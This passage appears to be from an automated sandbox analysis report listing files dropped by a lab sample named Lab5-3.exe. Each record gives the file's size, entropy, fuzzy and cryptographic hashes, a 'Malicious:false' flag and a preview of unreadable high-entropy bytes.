                                                                                                          Preview:...x....<....l..9.......6Pyp.{.u0Fe,..d bV....Zu..|.y.........+px.....v$...D..i..4.s.w..h...n...;.'tD..........}.k.........)#...,..........*@..-.........KN.*..l.*p.....).FR|.....e...;..0.R)....y.._....[.7.....}.....`<....=.].*Z.....e.X\....A..l.....@.r....G.<D....+q>..... .I.<B.{..N&.g...8...3x....-TXR...I.OfZ......O.k..5...#.G...j...y".'.4..)....oN.L.~.bR...V...*e(V.?2.wy..g.H.8~.2..0..C.s..}..(.R......y.Z..1i..A .r.I..9)..B.X....$...X...e:U....T.|.s9..X;:...yXd...i..V.`N...J.jAYc8....A.O..s,6.b..<1..A..L.dQ..=.......'(...0.......&.K......7o..O'.v.A.a.......bm/.S....=.2...q:.((.O.2.ir.6..o.....n...u:;.X,U...e3\........w....M...}....=...q...O..~65..4..,X(...1.t..B2...z{.>....J.b..[^:.9..id..c...v....\.{...L..vI.^u<e.s8Z....D.X.........z}.~.*Y...K..G..\.j..2..w|L2..~.U..k"T.5.......*x...^....<....f..2..I..W...;.....k.O*..0\.......dq.(....}....'...9..^..q.....h@P.x.1%...;.M...mQi...N..[@{.....>...!.|H...J..{.]..v.U.vt=T....;BT..xV..p..h8.{...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.934246048666695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fIbRBBJiV+4jMC3ImOixolsYZ3mYyE5GoGJD7FVHfUTid3hBaUoSGFcmeykEdEE+:wd5H1tZixCL4vjVFuGx0uKeY2ElUJ
                                                                                                          MD5:4ADCB58C583BA8351898BA65A8B12CDF
                                                                                                          SHA1:C92D73E083DEC9D852304509CFDE1EE9BAFE4DCC
                                                                                                          SHA-256:77692B9F48FDD27EA260705A01DB9C560B4FC1AD6FCF16CC6BE1B6E63E891833
                                                                                                          SHA-512:9825651CDC19B698603DA715011F81932DC6435E5CF66CFC653DD70CF395C731DEFBC869BB59380E28F82D8F7789C4228431BE47F3395BCBF31EF7767AF286F9
                                                                                                          Malicious:false
                                                                                                          Preview:.I......".9P.R.X%5.y.....S.q..H.0.-.....Zx7n..O.........S..~9.G...g..{}6D!..5.1...M.....O...-.....U...).K^..p....'.Ru....e..Cv....\R./]fJ.W_5B.....Y5B. ..}..XS....&\4].h/K....Ly.....,..!.#..1<....g..J..(.>.....z..;e.fL.Q.......P...5..N...U...v6..R~....J..LH..R.%Z...G).&$.t.i.,.u.W?...zE..St..kie...DG....*.......s..j.U..!...1..qb..I.#..S>.i_.wn.....M.R...m...H.....Hz_.Y...2....9./.<!.n&..|.#.Q.........h...;..cJW."...+.s0IBu.\..8.1.b.iv.._:..r.l .$.GJ.G.....>.(.T^].............X9.$.`.....z{.B...6.}..O=-...7a.mn2]/4......!hZ..A...N..d..&......|.Z9.@.......Y.3.O..P....2.....n.`e.^p....K2z..\}].....FwZM5O>.xqr(.lq...m....n...P....g.T<...S..O..........^.Rgw.xjw..F/.eL|..Am%|...w..=o............%\..E....K?6.....(..i2.Lf...b.'...q.K..+.^b.J....e2 ~..>J.~.d......;...^6g..C$.h...D..e.f....X..l......#...O.......u2..7.o...>i.1]..e.K1fw.S*.$..0^_Ll7j..9......g...D....,.k. .]I..>7..I.}].P.....#;:...p.Ho.Z..ux...5#..s..........:.dE.7~98...\9~.j....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.92673583293249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uDKwxX6lGazaw3d/g6oaHfUTid3hBaUoSGFcmeykEdEElU92i:uWwd8aM/g6o1Gx0uKeY2ElUJ
                                                                                                          MD5:175A1E8B5FE14D44D2C86A82A9401BF4
                                                                                                          SHA1:D66E515DF085FE2C0CBFBDF2B4F3DBE585CD5EBF
                                                                                                          SHA-256:3215B2D9A11ABE8B4DA0E028080AC1AB7F4B1C81B4448EB301861F7D759E494D
                                                                                                          SHA-512:C14CF4DCA5CBA90D0B0E482875B60A83C7B307D9316BF0914CC7C0AE79DE04AECCE55079C6597C090858BE6793B891378283522859B1C14FD20991727CEE6F73
                                                                                                          Malicious:false
                                                                                                          Preview:]M.$.Kf...B..i9..#..fJ...(*.....I.y...a;l..z.-.0...wh........3..`#....\K1..../.,L.x..."...<.6N....!....a.>.>f.T..2.. }..d.k....'X]......l.L.....J.....OcfQ.3...".}rNo....."aci.%.RB..^...v....p....'2.o.<./...A..~...)Mi..E...%.T..!.c/j...FT.(J.c95..f.@.6$.e.,.....&...W{i......(s.FB)n.@..l.N.v.1:.|.Qh.h)."ZrY.:....$.m.T......&...............Z..t.a.y.....QkZP5N.....N.~.Q.......j.m.?E.F2js....p..u=.....hg....j..j.m........}p.ni.......~...........X..j..e...c....~.Bk...ff.+.....\...........d..R..&0....M..{!........C...$T.].Ln.......B....L6.....<.R.....H..]...Z.rc.u..>rS..}.........y8eY.M..9..c..tN.. ..-.y..A.Z}.4....L.\..R.E...Ts.N..M.....?V...d.i..'n..AD.....u"b.v..8.3..[..zSxk....i.Q..)$yIw.\&~hO[....K.....K..$t....N31b..Z.?;..f.).......Q...K..............'.....E.. <&Id.d..-FnP/..:.L0.i..a6e.V.H.j.}.......x.d...c..}c...k...?..C.(..3V2.nzg.....T.....|.{P....k......@.......j.GJ.H ..?..[.{qE.3*!.N...;...Q..bs..........F...[..9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.923916043443797
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mgWAojvH/PAWyRchxcVvxZNCHfUTid3hBaUoSGFcmeykEdEElU92i:hWZvH/PFyRchC3nGx0uKeY2ElUJ
                                                                                                          MD5:431ADC4770EA6F6C1195E108BE38AA13
                                                                                                          SHA1:336D725AF6FEA909663206B54640E0CB598E4FE3
                                                                                                          SHA-256:883E456BB69DFFEE7E19B2B1132190B1E0141034182BFF5A9E781C7D4416F966
                                                                                                          SHA-512:52F4CEF1AB7AB3DC3B854E5AC79BE2CE58679A2B3585203A0BCE527C573268FAE534E8E8AECF7E63533AC6AB020B55C58B279D51DD3C7E37480162D01E764B3A
                                                                                                          Malicious:false
                                                                                                          Preview:nvJ}t."........3'....f..R.vk ..C..w=\.|....rH.Ze..(......\NJ..O.n...H....5l....,}... &pS...H]..u.&..r....|.hp..c..:6.h..co...E.H.ga..gy...qLKCs.....,.K.$.......k}&7.;...!..0'U.'.........h..."....$J`. ..R\6c.. ......o..K....#......1.6$... .z.O~4:ZYR...'..#.P.......$.d.&5....Q.....O...3.|.....N%B...?Z!...v.Z.<j.~.O2..]:l.z.M.J...b|....|mq4..j...b.J,..[.@O........p.A..U.a9gY.}.FF9....F............hPz3.4...9.9.,..k...=...R.jP...u=WA2..6.si..68fQ.D2..AQO.;;..T.1b...#.j.qlVzI.a.-N....?...b@[K..}.....fk"f.7.d.g...<...$..o[....Z.{...uAZ.....m8....=Y^.N...W-j..'9..`1..p",./J.i!gc..2*..?B..}.x..L..=...s..n.~.]{...9&.l.'2.Tb....d.9....Z.k.8.).....:!}..N.|}.]vN...i.xS...S..!B.|....e......@qvgB...y..i.{.x..[+\.G....hmt8&g;.[......&.i..K.?,.}`.]....`.T.v*De..`R...- H.!..7Nz9.<.1..J...z........o...Q.M.7.Lk:....:...).....2-.Y..EO...$.y.....|r...5. ........eA$Z..,..%./.e.1.Z.Oil.ov.W....x..#p].Az..mb.C...*r(....zQ...4...H..^S...r..#!~^@...../...Of..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.9288588829836355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0DCiDA75QAusoa4YY0ndtbHfUTid3hBaUoSGFcmeykEdEElU92i:0eiU75QAHDnkGx0uKeY2ElUJ
                                                                                                          MD5:D7A82A60D00DBC6D2FF3704252C91E89
                                                                                                          SHA1:80533800A88DAF764A159D3A6666A39A495DF783
                                                                                                          SHA-256:D2DAA903176EC4A8D0C3E60196924EC77C85C3A11A9ABA927D58BED903EDD147
                                                                                                          SHA-512:FCDD5157D2BCEC58409CDE602DE018A088E4CBA310C98FF2CAD584DB64D1C0588FB817DC98E46EC005A2DEF37AF8417EFC6A1D520AC43E87F34749CC0EAD6EEB
                                                                                                          Malicious:false
                                                                                                          Preview:..d7M.X7'x..b..<b/.....V...a...v....5.[...%K.....}.{.r.uSd./....^.. .@..j..'l`..^(...A`...r.Dg...t...*.r.%. .K...X...>.s.....Ae...,...`9=h."............j...9c.!.......^..o..}..,....4.K...@...wb........b+.....3/$;....%.P..)c.f.......k...a.P,=..D.8|0{..pMi..~.......L..u.U(.Ey.).E.....2:C.C......r...Aw....%...hJ...Q.gr.....zL..Q.(.N..C...Y5.9.,.....c..........T...2..e!^..a.a#c....]...J..........r.7..x.."6..D"Y.~.-Y...d..Kg....c..*.5..H....4.V...Q.P...\J..@..S.[...3ae.%..n..X4.^..........zN..t)B.x\.p..+...(.O......UwFa&WbMF...............rws>+...."z/W....v.x..h.S#.Y.m........q..U..xC......6./..k.....%.A....DHU.(.......+.D..jk)....[#4).p.].E.j..#@.N.F'1k...023.*U'.^L...i..[C.o1]..}.bS.~..=..&.`z.5}.p8u(..)Lc.njTe...j..x..=.......G..s.h.]0#.}.8..`l..8.*...U...I<5..._.x !.|B....1...i.. .........'V.A..R.."n.[......W..OO...K..ZV.un..u^..yzF.H......~5....!../2$GsVW..T......<...L(Bb..!...vd.......g#.k......h....V....'.....r.....dl.B.]?.....<......t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.929209307130918
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lY/Y7fZWbqUIPham7O2KvD2GlHfUTid3hBaUoSGFcmeykEdEElU92i:G/wfZGw7jGx0uKeY2ElUJ
                                                                                                          MD5:16F83C9031D83E5345B1ABA75AEA9929
                                                                                                          SHA1:CDFA2DF2868C5F8EA2B62C9614CA17E493B3A37F
                                                                                                          SHA-256:6451499686C770E617DF4174F6CB2EA6A0D7FF997B05E17AC5595A6B8C11196C
                                                                                                          SHA-512:CE67ACED24F5FB82EF673CFEDE9C78BA2B4DD19194ED6ECD37F39509AB6966997C20AC0B6BECE4EEADDEE657AB251C98D7F015CCE06887206D5B5B9AD4979125
                                                                                                          Malicious:false
                                                                                                          Preview:.%......"..j.'.fqL.-9..fR9..F..2DG ...........5.lUw~u....5.......G.<..0.Tw.+ \...nf....xk.....e...'5....K.LI.eT..=J!.......X..?..R.h....-..]..9hx$S..$0.EE.2.)..&...P..e./.7J%.xO.e/....m...q..6.Y..s...F..c.9.*...U....g..xQ.e..N .T.....frXP....I#.{.X.9eF...DfK.t..E>._...`..`g.b.K5........%..1.R..A........AI.:.8....5D.S.r.U.r.|p.Yp.:5..Z....P...u.8...x..8.....U:{"'9.$.. E.0GV..q.i/.aE._.<..s.T..?=..k.m......4.....l`.Db..Y......=.W..0..Qp..3.V.M.\......[.Oe..\)..E.k..gy.A..Ez.u.Mw+..?h.P.zP..^...1;G2~p ..@.......N.......i.......po..j...$WMG%~X>E+..'..J<.1:.4_..........XK..SU.:.k....-.......&.~......Y.....Y..?*?.....Oi.....%S..h.....x.,./R..04Z...w.t{...7....p......6s........c.F...L.f..._.}...^p.`..W.*..o........\]...SB8..Ka../...b.c..n....2.h...+C.(x..9/^.3......Hw9$N.h.;.PB.3..J.2-Uv..h.r..65R1.."....+.d..m....T. C...cn>n.bg......!..........q.).:81v..`....}I...........W..p.......).:.......".3U.w*fj....{qw/.@h.D.+.d..A'.&..S........q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11280
                                                                                                          Entropy (8bit):7.983633982712524
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:tcktew4W7ycPYoDeNHKYPFvYgdbBANyO2Sr2fTiC///+MX8CwrdBWJ0Cb:tckowVDYoDzYPFldAgO2tfO6MC6/WJtb
                                                                                                          MD5:855325ECD2CD8E9876873BD63334ECD2
                                                                                                          SHA1:B1926189F34215B4C380CC00459BAAA0FE142AF6
                                                                                                          SHA-256:899724B4B4B3BE681AF6EEFA048644B4EE7B2AD8F7D7C90A91C5AFB48CEF242B
                                                                                                          SHA-512:9F7E5C585B4AB2EE2CAE44A218E0933DEF7461556B5EAE2A6709438132EA98C080698EC8610D09C64D9A82F8D69517F6C2A682A24000C800EF9F53EEFA777A08
                                                                                                          Malicious:false
                                                                                                          Preview:8...../...$..1-.,......w.2v..%...0..8.l.YK.z.C.....d.H..P.X.S..............[K..&..2.,.[..T..$..;f....,....U..............Y."'$M.DT.2d}jK..kI....@J@bX.d..o#............<.i7.VaR...N,0X}Z......P...E+$0a......V&....+8.B._...]5....H.#...&..3/.|s....paf..t....':eB....E.I...b.}.\v.^..&......F....9[^..(:.,....t]......u..B....R...N.#%..=..zcQ.\......p@.....sw.i.3...;j........I...ZW%1.?S2.fX].I1..8....|..mY.j.l..f...........6........o.@.A%_.H(j.}..G..4.{.j.W....T..<c0..Q.V.au.H..w.h....U.........o-.....%#(..r#i../Z.xl.......w.>{..18.P.r...K....O......_.2.?.........Pb..A+...Y....kp...-..,`...o...w.`s8+u5...Lx..1....t...d.{....Y..../....JNA..T.Y.I..+<<..SY!9.*F.H,.Y..h...w=..TB...!.a,"a4..9e.............Q.},cr.M. ..Q...2KB..Us.....x..]z.(D..w3..N:._..^5.....s..>+U6..a.-?.~.N...D.U...[.'..>..F..vJ.5:..6.[..;4..3P....tY."d..<J..z@.z\9Qj.2.-.._.........R[...<...E.|Ds..}.[.b...50-.*su..{..4fH..13Z..&C..$.4...."...n.j&..........wDe.<....]2,.^...\..Ik..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17856
                                                                                                          Entropy (8bit):7.989322192579428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:JvROzNjOITn8LK4q9JXThkFJUfUPtzDF1pT/PRkIrOmdotb:JvczNjOIjeKxJX1KJL1zDR/vrbqZ
                                                                                                          MD5:F27D5C1E8644F2B8B89644FCA505B8AD
                                                                                                          SHA1:5574FCE249EBADFB9A0DA80C0B871407D148D0BA
                                                                                                          SHA-256:A9AAD4221E69BB9B3EC0008DB2118EFDAA5D7AEAE16E021CBCD087A49044CE41
                                                                                                          SHA-512:6686A35FF166524D441AB7C7968131FE58BC404916F5E02E92BF2870F82B271F63E7206782BF9FEA7B13B549029BB5E63AE11C36DC3B7E265F0A0CED90B7D3BF
                                                                                                          Malicious:false
                                                                                                          Preview:...mO.....dE.V...............<<..)R...e4..>....kn.i%...d.....!X&..1.....q.x......r..:K......._O..M.._.`...0...s2G..@.p..jp.%[...SEWevv.(.^..O...T..,...........4..s:.F....c.>.6.w....}...A.+.Z-=Y)A..w....N..g...`t.cC{.H.F....z.z..$.4.S.n..p.0.}_..Po....M.....x\A.x.v.N....U..8._...R..+...V.n..[....*...a...B.E{=~|.f....n....i......:..S.d...Fh>...a..u........z.)x..h?BN.}k...aK..{....(}.x..LXuF.+.}M........&...mt.9....YK..V..........~J..6$....Q......z.&.h.+v..;..,u.(k..,5...H....H.........|..WTNY.A......."u.2.#........ne...q.^....6.k.....[.Y...M..E.=.a8.A}H4Z.....z..D]..3\g.....H.e..8v....n....t....hr...J.f/a!....dFqUZ/..X...Xi...".+5..#....`w..;........(\...{..6..I.'m.C..gk.[.2.;....=.C._.H...XD.G.......a.2.VR^...D.C..0..J..!.1..sL.6.]......;[u....J..7..[@R...h.r..J..-.<[.X......L..u.;D..J2.9{.H..!.=....~.B..y.L.`....{}....]....+...v.....E_....j.c[!..Gw..>..8.k3.....&..W..-.C.Z..G!....]pN9..Q<......:.u@.$QR}t.Sn{b.".%.,....Y..wt_E.]....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6976
                                                                                                          Entropy (8bit):7.973534988121486
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:4rvaWliTy2lXhU1N1tmKNyjF3VFmxdhQvP5D+LXtcmStvXfbaWPX1D3KAtZWMbVI:4rvHiTdlxEN1tmd9Vag5Dtt/5ZC0Cb
                                                                                                          MD5:D36835305ED646F1F341E769729E3E55
                                                                                                          SHA1:BD00DF672C3EDFDC78698E83D1D968D8763CA194
                                                                                                          SHA-256:EC1963C74B3AF5DCAC53200544BEB18306EA9B15EAEA53D71979D796B21DBDE4
                                                                                                          SHA-512:CCEDD1B839F3E10B69E5ABE7FCA19AF5E2D5F1CE61788BE7124838A5D98F65AF0824AFAF70CE1DEF177B71EB32A956B84BBF508025E0C64311B81BAC4A72CC1F
                                                                                                          Malicious:false
                                                                                                          Preview:;3.....)...m?.O.UzwWYT..=......Co..9.#.|O..1..+......9...^...:...;....|x.e.q:t.v...6....M...27J6]y37.E...Ld.m......_.. [.k..{....X..c h.~_..z.d).b.e..M.GK.8J.........+%.i.,\.'v.;..O.....6}..9\.y."u.....{T.....E.....v.we..n..p......`2.._KD....Ii..QG.....u..0.G..rj..M.K.D.7..5Q....,...)..6......=.a.......(.7Hz:.....H3.......^8%.......k..g...KZVP.<S.V..2..I...B..^NG.......o. ...b6..<q.P. ..m....N194Z....H....lH..X^O....L....FS}...P..M.............ti2.1.6?..J..:)..........8......8J..?..(..gP....Z+...j6..~.Oz....%.K.a_..3(E.9.I.N..G.m.Q..h.F......V._..._.We...D.D^.fNPIkh...........0.......R.8!)%a.U0_....{....X9.X.E...|..KMT.)...3C....5./......m'...-...G..u.rD........Y..r........M...n.P....H.a].P.05p.....Ek..tP.i... m..v..x...8..A.B.J?.......~+N...P.P..V.... .u...!.....(.......|...*..._...Z....'.N.1.-...H^..W(..x..g..j..t......".....G.gw....W.....E.'3.."..f?.Z5..&..DPi.I.. ..<.....pdRk...4.>.......7.4?..8`.Z...7/...i;.w.|E{...<l).o...'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9488
                                                                                                          Entropy (8bit):7.9787620559743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:qGFHxUwlC6Inep4Q4IW5fr+qQ8tHgm3Pb36sG+L00Cb:qGFI5Q4IW5DDtdb36Ztb
                                                                                                          MD5:277BAFA300019E9FBFF6E9ADCD3ACAC8
                                                                                                          SHA1:62412EB98C08F92F58FA686AB50B03E10EFCD7AC
                                                                                                          SHA-256:6E94503BB6F4219FE50083DBCEB95CC4EF5D6C112D7125212E4BD25DC594805E
                                                                                                          SHA-512:A38907CD8607437F208944A3BA7F6EE124653CC278E84C477871110D6522CC2EDEA7CAA7DFFDABAED0D1BF7791BCB3C291B3859955EB2E3C452EEA744B7A0EFC
                                                                                                          Malicious:false
                                                                                                          Preview:H.....6>...hY.r...+..Z5...1.jn}.pN_T.7...>.....(.$....*..n.iA.w.....g%Qch....E...~....:N...MIx...e..H.r..':Yo".t....=.S.U.-!.*@..A.`..\..|W..hXT.j..$/...,aEl.....m3!K..a...x.w..n~)1IuHl.....hP....}..=..P1.*M.xw.l>E|.Z.3.....0...1.......X.D..o.*.yk...x.{..D..#...|.S.R.)&@...HJGo...Mpo>.O..>.._wN4../6<.4x.h.\>l....J...^..B.P./...F.....CQ..G..o.No>Q.o.^......./A....Wd6...&.\H.y*...../..s......-k.$..q..k8../S..........x].jQT4q.I.Ke....>r.......3....Ws....,......F.jM...._......J..E.N...~?.kDo...wg..-t...........t.9.......).....qI]QfU....;.m.gh6...x...q..#IwK.........x..1.".5.h.....nE..#. YX...vt...h.>8.<6..?.{h.....VFBU.R.26...R.....Q_.:..}MK.l..&....5...5rt.2.m..:...a.r.......Q ?........x.z.......t.".......UJC...z.].b...""J(%.j...[.........?.I..x..9.~.p%....#T.G.H....O.P.6N.1...4Ye.h.8f.. ..2./..gE..K....*K.so.O..2..x.=.o$..S.(.....VA...4.I......'+.#.-..xLG.j..d$..M\HV3..B...L...I.r....6.l\o.w......@.l..S.1G.49.7.\x@U.....4.g..<QB.@.z...+.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4048
                                                                                                          Entropy (8bit):7.9549352887451255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:7f8LaA5DTe/U8oJbH5PNHstxSZNQGx0uKeY2ElUJ:7fyaAZi5G1Zst6j0Cb
                                                                                                          MD5:911F1413EAE8E38BC038649B8EFB7C56
                                                                                                          SHA1:0004B964F05E4D7F72993963745A4C66A4D396A7
                                                                                                          SHA-256:12994DB2FEEB6678779806E1B1DEDE810B98C1305F23010EE87EA1D3DBDC6782
                                                                                                          SHA-512:8DB6813066897CF24AA6BDBC5390A8DAAB9DC3FC94747C8F29AD67C1EE5568714A8A9171F253BEFD34676AEEF02F5DEAD23D1EF87E80468E2ABA77BFA8EC281F
                                                                                                          Malicious:false
                                                                                                          Preview:.....(E..X"$....`7/w2...(9|....KR8....]rX.|.o'.....W.##N`..`.....i 1.....3..[.|.?q.N.H...]..{.g.]..Z..q..\oC...=..X.j....p.>4..M{..O.+.f..Mf5...t ..x..Z.].."|.....>.N...7 \.,A0.{........!g..kn6.J{/X....sKt....7.s..}.........\....fi.`M...S...n....t]&!.....]?...f.*a...~.r.v.6...U%..).'.%..&.G+..-x.t..lI._~..9........u..V|5.w:...ZnM.@."("../.l.....3"T{..W......s....z.v.B...1Ut'....A...^..Tg....EgLq.p..C.m}..*...W....+.^.%.;s.%5....Sl..LG..W..x....mF..dJ.V...$*..,o......>........ZI..V..Hi1[.T.#t..H.P...8....H4..8.#B.\...jA.kJJ....7..,.Bm..^....g<?.<*....0.-">lp.;...\..v.m..7..6.q.'$......;.j0UId..p)I.*vM.........."..f.E..ikM.......)1...._...o(.R..x...-T.....@..K..W...D.:&of..........}.NF.mE.....0OR..93.....A...zx.#%./+i.*T..=B..N!.A.9e...y.....{....X..9`q..q...<...Iu.x..n...+..5$.>.........VG..#.z..$....."M...Sq#vd.c.iB=......ZZ...g.....V.lS......F..6....Z2A(....C.X..0.P!+.R..iK...qs.]:<Z.F.,">.3.$.dZ...."...t*.fO2a..?......K..y<..FB.."&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.9044312239654655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WrAnpt0Qz2pcSvPq12OKHfUTid3hBaUoSGFcmeykEdEElU92i:acwv3q4aGx0uKeY2ElUJ
                                                                                                          MD5:2C937E70D9A52561FE89968BD0F74DD1
                                                                                                          SHA1:314F1D0FCA3BF01BF39F5ADA1402F4893457F845
                                                                                                          SHA-256:125543B6E3DF6EE5D10D67B08D0060B9796031DD89268F068789A9AB9C81263A
                                                                                                          SHA-512:801948A0A539E1AB1B1C43F4EFB40404CB6CE47E557E1BB6D6D672B2D037FA9D1C83AD91C592B51728A1744D2182D7E4CFEBCC0C7E37C4F6B7BCF0AE3E3B43FC
                                                                                                          Malicious:false
                                                                                                          Preview:iH.5................vD.P.9.*..........;7..c..K..F.J....sly..p.......o...'S.C&..lU......n)..p.[s.|:...@.`.....)G.\)].^...~.r....gy......">..7..u..&.Fj..b.\;....l...H.e5G..r.Ven..8.i-...n...z............I.....}..M.j6w..J.}..v.....B.v+../wP.....)V.A...@...6.p.,.zT.8o...+.+..i..........)H46....x.X.......,.E@......H.r....6XB.B....Ss.<.;.X.B~3z(....y9.|..>.x..m....,...."W_q.6c)S.~..L<^.VD.A.?.........;..wv...X....8.E.......PF.......v[q.v.-=hy.^hI..z(...k.W..7B..u....A..aY.~V...R.Q..'..V$$y...e.8..u.L#........+ a...j..?.D.Z.^....=.]x.j.M=.D0.B...........1\....S%.@..[#.y.....i'&e..-p.fI~1......y..S6....q)..O_=.0.e}9...or......0...)^...E..v)^.b.....=...Ln...i$........5.J...Q..X.:.Z.....?...wEU..}.@.$..<._%.%E.Y....U.......|...CI...w..w*]FfA. ~./..K.K..Z..2L.3..d..G..|.(..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.945139400839989
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PYGuHkimPECj7FBrwDHPbrEuFNzEyyqPW5LSKHfUTid3hBaUoSGFcmeykEdEElUJ:PYtkxP7Br0v/bNByT5LSlGx0uKeY2Elk
                                                                                                          MD5:3AFD560AFC0834FD0F95C2AA3ECE0045
                                                                                                          SHA1:19E1D827405A5FD74D725172AF9D3FF3755A0D2E
                                                                                                          SHA-256:7C58C924C0EC99CAA28970B9C3692BA6172C3F1BFD7D2E1A94FB8D81DC1579F0
                                                                                                          SHA-512:61A4B0809DB38EC2D909055B3E8BE4A6F072DA44D4A6235F9F93F2CAA4752F4A381470BCD3B441E94A0720431ECE12C03CCE9B60980E14DC6D0AE805B3FFB692
                                                                                                          Malicious:false
                                                                                                          Preview:.m4..(..O;....g.,W.c.j...2.^..L.F.....`Y.%...O....8.....k..!.>.....Ee....f. c......lDF&YG.c.s..,nT.......LTx.A\.&.6....jfY.\X./q.b..;Y...t.j....>.u..*.......#..c....{..an.[...Z..........fx......Q..BC..Y..a...x4.wR..?..FrGY..OK..s.!...)....K.i.{u.V.0...@m.7&m......\.S...............}...^.'trT.-.....z...E..9........S[$.R..p.l90^.,D..|l.....m.._J.+.9.8u]gq-.f..vC.._>.........Y.2;<......;|..i...v....M.........mh..'...b/.;mF..q.O.....0~i.....=...yq({(...F...G$Y....Y.M...[&..%.3"..k.~..=....JA.g.c.Z.t".Y...........R....u..Z........r3..s.xh..?{.0..L........K.0UKg.8./...'[oU(>]L.../...F.`\.c5)..3m.p]{..Lm...w<8g....'eUO2..~y6.H<!..g...".e...PB........[.vEW23......u......~..[..E.z.$........c..~.w..#.. .~...I8^..R....C..Oc............Q...K..9c9.....:.V.-..N..S+"..;cV.1..e...t...T<...J.<.G.l..Z...[.1uc/.(.3.fn..q.iu%..b=.H..m[..L6..mvs.5........(........X(Ce0..t....v..q..^.}..A...o..u.~.3.!C.....K.......D>.U.;o..Z....k>.l..F..sf..2............B(.O..G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.920490491537528
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RqVojJPTz2rwP6rVTm+Hcm6HfUTid3hBaUoSGFcmeykEdEElU92i:46jJLqzI+RVGx0uKeY2ElUJ
                                                                                                          MD5:DB846C0C0C9DF1E58D7D1F6F1C7F25F8
                                                                                                          SHA1:AD66B4EE5E5792BF26D0873DE002B08336E46924
                                                                                                          SHA-256:7EC0ADAEC5C9C387723097364DBCBDCB76A5FD246B00AB3A07552BA459222247
                                                                                                          SHA-512:58FB4D4CFFD670DD274D0773711497586080DB855625BA18D23947EFB3083B31668D96A7188BD10AA3AF8DA413333AECEDAA68B4602E9297481CDFAD1F8EA62F
                                                                                                          Malicious:false
                                                                                                          Preview:.k.!......}...'.dq....j...ujU....4i....^}....1..`'+...%.....[..i.C.G.C._....~(....~...(.V]..%..s.lZ.T3. ..&,h.*..O...,.......i.Fw_........r\....Z..Jk.#.(......mP..p..6...{.@R.......p........%+W.......8[..C.&......m..{/..........h9b.P...e..J.ipx..M.ND_...I........9.........W.`M.....oD.E..F8.$D{...i.&u`.w..Wyo.Nu.$.s.Mx'..p..us.D.DO.r.p...d...N.. .........!'.%O/...x.=...w`./KL...=g..........-/).....S.{..........k.$.3}.^".S...8..q...n...w...'..#1.'v..a...`l..G.'v.7...-...u}......>...*u......N.P........jjb.....8R..y.....B...D............L.X.C..P....cS..<.Z[.....E^.f....=...b.>..c)i.....q....+..J.....E.@.#.....Nhz.vi.. .._@N...A....6..-*.....R.....d_[,N.,....K.0r....o.H....>.....i.Y./K+F.t#M...O......%........?SH......Kt..`Ff.&>2..f.4.j......|...z...QE.3p.T/..X...9=3...P./X..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.909003558338863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P6ya0EcfOKh1WFPUMeBmfigHfUTid3hBaUoSGFcmeykEdEElU92i:yyIcvgDDfinGx0uKeY2ElUJ
